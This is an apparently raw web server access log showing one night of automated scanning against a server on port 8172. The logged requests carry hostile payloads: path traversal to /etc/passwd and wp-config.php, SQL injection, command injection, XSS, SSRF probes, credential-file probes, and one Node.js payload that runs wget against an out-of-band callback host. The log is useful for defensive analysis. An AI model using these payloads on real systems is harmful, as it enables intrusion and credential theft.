Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 404 7 0 56 2024-12-12 23:13:53 103.153.214.94 GET /OA_HTML/ibeCAcpSSOReg.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 38 2024-12-12 23:13:57 103.153.214.94 GET /OA_HTML/ibeCRgpPrimaryCreate.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 70 2024-12-12 23:14:02 103.153.214.94 GET /OA_HTML/ibeCRgpIndividualUser.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 39 2024-12-12 23:14:06 103.153.214.94 GET /OA_HTML/ibeCRgpPartnerPriCreate.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.25 - 404 7 0 56 2024-12-12 23:14:19 103.153.214.94 GET /cgi-bin/db_eventlog_w.cgi date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 60 2024-12-12 23:15:05 103.153.214.94 GET /wizard/database/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 23:15:17 103.153.214.94 GET /web_cste/cgi-bin/product.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.61 - 404 7 0 37 2024-12-12 23:16:31 103.153.214.94 GET /cgi-bin/kerbynet Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.0)+AppleWebKit/618.25.8+(KHTML,+like+Gecko)+Version/17.3+Safari/618.25.8 - 404 7 0 38 2024-12-12 23:16:54 103.153.214.94 GET /download.do file=../../../../config.text 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.27 - 404 7 0 57 2024-12-12 23:16:55 103.153.214.94 GET /index.php option=com_prayercenter&task=confirm&id=1&sessionid=1'+AND+EXTRACTVALUE(22,CONCAT(0x7e,md5(917404626)))--+X 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.17 - 404 7 0 33 2024-12-12 23:17:08 103.153.214.94 GET /ajax-api/2.0/mlflow-artifacts/artifacts path=C:/ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.11;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 56 2024-12-12 23:17:49 103.153.214.94 GET /rest/users/1/settings/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 72 2024-12-12 23:17:49 103.153.214.94 GET /Admin/Admin.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 57 2024-12-12 23:18:16 103.153.214.94 GET /dlibrary/null oldfile=../../../../../../windows/win.ini&library=null 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6+Safari/605.1.15 - 404 7 0 34 2024-12-12 23:19:11 103.153.214.94 GET /eam/vib id=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.24 - 404 7 0 57 2024-12-12 23:19:19 103.153.214.94 GET /index.php option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 23:19:20 103.153.214.94 GET /conf/nginx.conf - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 55 2024-12-12 23:19:34 103.153.214.94 POST /control/login - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14816.131.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 218 2024-12-12 23:19:43 103.153.214.94 POST /interface/main/main_screen.php auth=login&site=default 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 23:20:34 103.153.214.94 GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php action=style-clean&file_path=/wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 23:21:40 103.153.214.94 GET /WEB-INF/classes/META-INF/microprofile-config.properties - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 37 2024-12-12 23:22:43 103.153.214.94 POST /rpc.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 23:22:58 103.153.214.94 GET /wp-content/plugins/church-admin/display/download.php key=../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 51 2024-12-12 23:23:00 103.153.214.94 GET /debug/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.22 - 404 7 0 31 2024-12-12 23:23:06 103.153.214.94 GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS /.. 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 32 2024-12-12 23:23:09 103.153.214.94 GET /wp-admin/tools.php content=attachment&wp-attachment-export-download=true 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 23:23:12 103.153.214.94 GET /wp-admin/tools.php content&wp-attachment-export-download=true 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 31 2024-12-12 23:23:23 103.153.214.94 GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/CWLC.css - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 48 2024-12-12 23:23:27 103.153.214.94 GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/8CAB.css - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_3_7;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.7+Safari/605.1.15 - 404 7 0 34 2024-12-12 23:23:29 103.153.214.94 GET /admin.html s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 31 2024-12-12 23:23:53 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.1 - 404 7 0 105 2024-12-12 23:25:48 103.153.214.94 GET / q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 66 2024-12-12 23:25:58 103.153.214.94 GET /api/security/ticket - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 42 2024-12-12 23:25:58 103.153.214.94 GET /request_para.cgi parameter=wifi_get_5g_host 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 54 2024-12-12 23:26:50 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-12 23:27:08 103.153.214.94 POST /xmlpserver/services/XMLPService - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 23:27:10 103.153.214.94 POST /swarm.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 218 2024-12-12 23:27:35 103.153.214.94 GET /backend/admin/users username=anonymous 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 79 2024-12-12 23:27:47 103.153.214.94 GET /cgi-bin/logoff.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 53 2024-12-12 23:27:47 103.153.214.94 GET /index.php option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.23 - 404 7 0 92 2024-12-12 23:28:46 103.153.214.94 GET /common/dept.jsp deptid=1'+UNION+ALL+SELECT+60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'999999999'))--+ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 42 2024-12-12 23:28:47 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 0 0 75 2024-12-12 23:29:13 103.153.214.94 GET /page settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://ctcj3jjbclslbev4n7q0efsktx5mgopiw.oast.live%27)%3b// 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.22 - 404 7 0 79 2024-12-12 23:30:15 103.153.214.94 GET /SetupWizard.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.41 - 404 7 0 32 2024-12-12 23:30:15 103.153.214.94 GET /laravel-filemanager/download working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type&file=passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.81+Safari/537.36 - 404 7 0 36 2024-12-12 23:31:13 103.153.214.94 POST /api/v1/auth/tokens/ - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 202 2024-12-12 23:32:23 103.153.214.94 POST / q=common/login 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.5+Safari/605.1.15 - 404 7 0 210 2024-12-12 23:32:42 103.153.214.94 GET /about_state - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-12 23:32:43 103.153.214.94 GET /backend/backend/auth/signin - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 23:33:27 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1.2)+Gecko/20090729+Firefox/3.5.2+(.NET+CLR+3.5.30729) - 404 7 0 206 2024-12-12 23:33:58 103.153.214.94 GET /render/info.html - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 67 2024-12-12 23:33:58 103.153.214.94 GET /index.php r=installer/welcome 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.19 - 404 7 0 69 2024-12-12 23:34:34 103.153.214.94 GET /+CSCOE+/files/file_list.json path=/sessions 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 11 0 37 2024-12-12 23:36:29 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=0 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 54 2024-12-12 23:36:32 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=1 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 55 2024-12-12 23:37:03 103.153.214.94 GET /admin/setup-wizard - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 44 2024-12-12 23:37:03 103.153.214.94 GET /admin/install/install.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/8.0.0+Version/17.4.1+Safari/605.1.15 - 404 7 0 37 2024-12-12 23:37:13 103.153.214.94 POST /inter/ajax.php cmd=get_user_login_cmd 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 198 2024-12-12 23:37:14 103.153.214.94 POST /login/userverify.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 23:37:48 103.153.214.94 GET /servlet/taskProc taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.0.0+Safari/537.36 - 404 7 0 39 2024-12-12 23:37:49 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 - 404 7 0 196 2024-12-12 23:37:49 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 198 2024-12-12 23:37:49 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 23:37:49 103.153.214.94 POST /index.php m=login&a=attemptLogin 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 220 2024-12-12 23:37:53 103.153.214.94 GET /MicroStrategy/servlet/taskProc taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 57 2024-12-12 23:38:12 103.153.214.94 GET /wp-content/plugins/adaptive-images/adaptive-images-script.php adaptive-images-settings[source_file]=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 23:38:42 103.153.214.94 GET /v2/keys/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 56 2024-12-12 23:38:44 103.153.214.94 GET /dashboard - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.20 - 404 7 0 34 2024-12-12 23:38:44 103.153.214.94 GET /htmltopdf/downfile.php filename=/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 37 2024-12-12 23:38:46 103.153.214.94 GET /admin/ n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 23:39:00 103.153.214.94 GET /api/v2.0/search q=/ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.8.22 - 404 7 0 31 2024-12-12 23:39:12 103.153.214.94 POST /login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.4+Safari/605.1.15 - 404 7 0 212 2024-12-12 23:39:13 103.153.214.94 POST /supershell/login/auth - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 - 404 7 0 224 2024-12-12 23:39:50 103.153.214.94 GET /installed_emanual_list.html - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 32 2024-12-12 23:39:50 103.153.214.94 GET /.axiom/accounts/do.json - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 23:40:23 103.153.214.94 GET /.dockercfg - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 23:40:26 103.153.214.94 GET /.docker/config.json - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 56 2024-12-12 23:40:26 103.153.214.94 GET /admin/install.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 58 2024-12-12 23:41:03 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.2+Safari/605.1.15 - 404 7 0 33 2024-12-12 23:41:07 103.153.214.94 GET /mongo-express/ - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 46 2024-12-12 23:41:09 103.153.214.94 POST /manager/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 236 2024-12-12 23:41:11 103.153.214.94 GET /db/admin/system.users - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Mobile/15E148+Safari/604.1 - 404 7 0 32 2024-12-12 23:41:25 103.153.214.94 GET /public/recovery/install/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.18 - 404 7 0 33 2024-12-12 23:41:25 103.153.214.94 GET /index.php/install/ - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 23:41:26 103.153.214.94 POST /php/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 207 2024-12-12 23:41:26 103.153.214.94 POST /login/userverify.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.23 https://bcvt.kontum.gov.vn:8172/login/login.htm 404 7 0 211 2024-12-12 23:42:36 103.153.214.94 GET /config/pw_left_bar.html - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 212 2024-12-12 23:43:02 103.153.214.94 POST /pentaho/j_spring_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.7.19 - 404 7 0 197 2024-12-12 23:43:11 103.153.214.94 GET /appsettings.json - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 65 2024-12-12 23:43:16 103.153.214.94 GET /appsettings.Production.json - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 23:44:07 103.153.214.94 GET /msa/main.xp Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 35 2024-12-12 23:45:02 103.153.214.94 GET /ExportReportingManager.aspx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 56 2024-12-12 23:45:05 103.153.214.94 GET / action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 41 2024-12-12 23:45:11 103.153.214.94 GET /avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 400 0 0 56 2024-12-12 23:45:16 103.153.214.94 GET /grafana/avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 400 0 0 33 2024-12-12 23:46:03 103.153.214.94 GET /wp1/home-18/ qtproxycall=https://oast.me 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.4.27 - 404 7 0 42 2024-12-12 23:47:52 103.153.214.94 POST /appInfo/assert - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 198 2024-12-12 23:48:04 103.153.214.94 GET /go/add-on/business-continuity/api/cruise_config - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.63 - 404 7 0 38 2024-12-12 23:49:38 103.153.214.94 GET /jsps/helprequest.jsp url=%27)%22+onerror=%22confirm(%27document.domain%27)%22 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 51 2024-12-12 23:49:41 103.153.214.94 GET /src/redirect.php plugins[]=../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 76 2024-12-12 23:50:07 103.153.214.94 GET /phpwiki/index.php/passwd - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 56 2024-12-12 23:50:10 103.153.214.94 GET /UI/Dashboard - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 45 2024-12-12 23:50:14 103.153.214.94 GET /jackett/UI/Dashboard - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 31 2024-12-12 23:50:32 103.153.214.94 POST /public/checklogin.htm - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.2;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 227 2024-12-12 23:50:47 